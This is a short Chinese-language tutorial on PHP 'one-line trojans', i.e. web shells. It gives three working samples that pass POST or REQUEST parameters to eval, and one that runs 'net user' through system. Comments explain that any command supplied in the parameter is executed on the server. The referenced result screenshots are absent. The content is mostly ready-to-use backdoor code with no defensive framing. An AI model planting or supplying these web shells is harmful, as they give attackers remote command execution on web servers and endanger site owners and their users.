一:
關於PHP的一句話木馬:
1 <?php 2
3 $a=$_POST['H']; 4 eval("$a");//eval會將輸入的$a作為php語句執行,因此只要對_賦一定的system命令值,就能夠執行系統命令 5
6 ?>
顯示結果:
二:
關於PHP的一句話木馬:
1 <?php 2 $string=@$_POST["_"]; 3 var_dump($string); 4
5 echo "<br>"; 6 eval("system('net user');"); 7
8 ?>
當POST參數_的值為空時:
當不為空時:
三:
使用REQUEST方法:
1 <?php 2
3 @eval($_REQUEST[_]);//什么類型的,如POST,GET均可以接收
4
5 ?>
顯示結果:
GET型:
POST型:
